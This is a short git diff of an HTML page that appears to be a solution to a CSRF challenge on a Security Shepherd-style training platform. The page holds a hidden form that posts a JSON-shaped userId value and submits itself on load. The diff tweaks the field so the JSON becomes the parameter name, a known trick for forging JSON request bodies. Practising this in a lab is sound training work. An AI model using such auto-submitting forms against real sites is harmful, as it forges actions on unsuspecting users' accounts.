--- a/index.html
+++ b/index.html
@@ -4,11 +4,12 @@
 <form action="https://shepherd.websec.dedyn.io/user/csrfchallengejson/plusplus" method="POST" name="csrf">
 <!--input type="hidden" name="userId" value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"/-->
 <!--input type="hidden" name="csrfToken" value="105700736606562306760126015519665357624"/-->
-<input type="hidden" name=data value='{"userId":"398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"}'>
+<input type="hidden" name='{"userId":"398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"}'>
 </form>
 <script>document.csrf.submit()</script>
 </body>
 </html>
+
 
 
 
